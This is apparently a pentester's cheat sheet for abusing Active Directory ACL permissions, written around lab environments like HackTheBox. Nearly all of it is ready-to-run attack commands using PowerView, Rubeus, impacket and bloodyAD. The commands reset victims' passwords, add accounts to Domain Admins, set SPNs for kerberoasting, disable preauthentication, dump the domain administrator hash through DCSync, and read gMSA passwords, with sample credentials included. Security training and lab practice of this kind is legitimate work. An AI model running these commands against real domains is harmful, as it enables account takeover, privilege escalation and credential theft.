Abuse ACLS

Computer Account are also user accounts and can be used to query the ldap like any other users, interact with ACL and you can also run bloodhound ingestor

Methods

• ForceChangePassword abused with Set-DomainUserPassword

• AddMembers abused with Add-DomainGroupMember

• GenericAll abused with Set-DomainUserPassword or Add-DomainGroupMember

• GenericWrite abused with Set-DomainObject

• WriteOwner abused with Set-DomainObjectOwner

• WriteDACL abused with Add-DomainObjectACL

• AllExtendedRights abused with Set-DomainUserPassword or Add-DomainGroupMember

ACLs enumeration

#Powershell CMDLets (Manul Mode and evasive)
PS C:\\htb> Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName > ad_users.txt
PS C:\\htb> foreach($line in [System.IO.File]::ReadLines("C:\\Users\\htb-student\\Desktop\\ad_users.txt")) {get-acl  "AD:\\$(Get-ADUser $line)" | Select-Object Path -ExpandProperty Access | Where-Object {$_.IdentityReference -match 'INLANEFREIGHT\\\\wley'}}

#Performing a Reverse Search & Mapping to a GUID Value
PS C:\\htb> $guid= "00299570-246d-11d0-a768-00aa006e0529"
PS C:\\htb> Get-ADObject -SearchBase "CN=Extended-Rights,$((Get-ADRootDSE).ConfigurationNamingContext)" -Filter {ObjectClass -like 'ControlAccessRight'} -Properties * |Select Name,DisplayName,DistinguishedName,rightsGuid| ?{$_.rightsGuid -eq $guid} | fl

Enumerate ACLs for specific User

PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> $sid = Convert-NameToSid rita
PS C:\Tools> Get-DomainObjectAcl -ResolveGUIDs -Identity * -domain inlanefreight.ad | ? {$_.SecurityIdentifier -eq $sid}

Abuse Foreign Groups

As rule try to identify users that belongs foreing groups and then check its group permission and nested groups. It may lead to lateral improvement to the parent domain

Example 1 :

User Intrusionz3r0 belongs to the foreingn group "foreingn_admins" that also belongs to accounts operator group on parent domain controller. this leads to the Intrusionz3r0 can create an user on the Parent domain and add itself to powerfull groups. (DNSAdmins)

Tools

• Bloodhound

• Powerview

Enumerate Foreign Users

PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> Get-DomainForeignUser

Find Foreign ACLs across all users within the domain

$Domain = "domain.local"
$DomainSid = Get-DomainSid $Domain

Get-DomainObjectAcl -Domain $Domain -ResolveGUIDs -Identity * | ? { 
	($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner') -and `
	($_.AceType -match 'AccessAllowed') -and `
	($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and `
	($_.SecurityIdentifier -notmatch $DomainSid)
} 

Abusing Foreign Security Principals & ACLs

#Enumerate Foreign Security Principals
PS C:\Tools> Get-DomainObject -LDAPFilter '(objectclass=ForeignSecurityPrincipal)' -Domain logistics.ad

#Enumerate Foreingth Security Principals
PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> Get-DomainForeignGroupMember -Domain logistics.ad

Convert SID to name and vice versa

#Convert SID to name
PS C:\Tools> ConvertFrom-SID S-1-5-21-2432454459-173448545-3375717855-3601

#Convert name to SID
PS C:\Tools> ConvertTo-SID Intrusionz3r0

Need Credentials?

$SecPassword = ConvertTo-SecureString 's3rvice' -AsPlainText -Force;
$Cred = New-Object System.Management.Automation.PSCredential('HTB\\svc-alfresco', $SecPassword);

GenericAll Rights on User

Set-DomainObject -Credential $creds -Identity <username> -Set @{serviceprincipalname="fake/NOTHING"}

#Kerberosteable
.\\Rubeus.exe kerberoast /user:<username> /nowrap
impacket-GetUserSPNs megacorp.local/sbauer:'D3veL0pM3nT!' -request 

#NotPreAuthentication
Set-DomainObject -Identity <username> -XOR @{UserAccountControl=4194304}

GenericAll Rights on Group

net group "domain admins" <username> /add /domain
Add-ADGroupMember -Identity "domain admins" -Members <username>
bloodyAD -u Thomas.Powell -p 'Password123!' --dc-ip 10.10.65.121 add groupMember 'admsvc' 'Thomas.Powell'

GenericWrite on Computer

• shadowCredentials (windows server 2016 or later)

• Resource-Based Constrained Delegation (Windows 2012 onwards)

• unicodePwd to change the machine password

❯ bloodyAD -u 'FS01$' -p 'password123' -d retro2.vl --dc-ip 10.10.120.69 set password 'ADMWS01$' 'Password123'
[+] Password changed successfully!

GenericWrite on User

targetKerberoasting (the password should be weak enough to be cracked)

❯ python3 targetedKerberoast.py -d delegate.vl -u A.Briggs -p 'P4ssw0rd1#123' --request-user 'N.Thompson'

WriteOwner Rights on User

PS C:\> Set-DomainObjectOwner -Identity claire -OwnerIdentity Tom -Verbose                                                           
PS C:\> Add-DomainObjectAcl -TargetIdentity Claire -PrincipalIdentity Tom -Rights ResetPassword -Verbose                                        
PS C:\> Set-DomainUserPassword -Identity Claire -AccountPassword (ConvertTo-SecureString 'Password1!' -AsPlainText -Force) -Verbose            

WriteDACL Rights on Group

Add-DomainObjectAcl -TargetIdentity Backup_Admins -PrincipalIdentity claire -Rights All -Verbose   
Add-ADGroupMember -Identity "Backup_Admins" -Members claire -Verbose 

ForceChangePassword on User

If the computer account has permission to change the password just authenticate to the machine by using any user, import powerview and make the change.

Set-DomainUserPassword -Identity delegate -AccountPassword (ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose

rpcclient -U KnownUsername 10.10.10.192
> setuserinfo2 UsernameChange 23 'ComplexP4ssw0rd!'

[DCSync] DS-Replication-Get-Changes and DS-Replication-Get-Changes-All on Domain Controler

impacket-secretsdump svc_loanmgr:'Moneymakestheworldgoround!'@10.10.10.175 -just-dc-user Administrator

ReadGMSAPassword

bloodyAD --host 192.168.210.15 -d domain.local -u 'COMPUTERNAME$' -p :24039a7fd44d8decdxxxxxxxc06 get object 'TARGET' --attr msDS-ManagedPassword
gMSADumper.py -u 'user' -p 'password' -d 'domain.local'

Refereces

Abusing Active Directory ACLs/ACEs | HackTricks